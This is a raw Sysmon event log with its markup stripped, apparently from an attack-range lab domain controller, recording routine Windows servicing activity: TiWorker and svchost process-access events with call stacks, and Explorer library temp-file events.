12:02:23.129{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005817Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.129{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005816Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.129{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 23542300x80000000000000005815Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.097{266CAFBE-64C5-6064-A500-00000000AE01}4356ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Libraries\Music.library-ms~RF1a591.TMPMD5=7C48245AD0469DDD015E149B30FB537C,SHA256=C0CF031EF27DA4582BF1A84C5316C9A088FBBBCE993CE99DC5864FD229B5D52F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005814Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.051{266CAFBE-64C5-6064-A500-00000000AE01}4356ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Libraries\Pictures.library-ms~RF1a563.TMPMD5=561CBEC334F373ABD89813D662818FC2,SHA256=05C52D17DC7C00612129BCF55F3569B7704C9C1EAE982B1320303C989F5A7C5C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005813Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.004{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005812Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.004{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005811Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.004{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005810Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.004{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005909Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.997{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005908Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.982{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005907Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.982{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005906Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.966{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005905Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.951{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005904Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.951{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005903Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.951{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005902Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.935{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005901Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.920{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005900Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.904{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005899Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.904{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005898Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 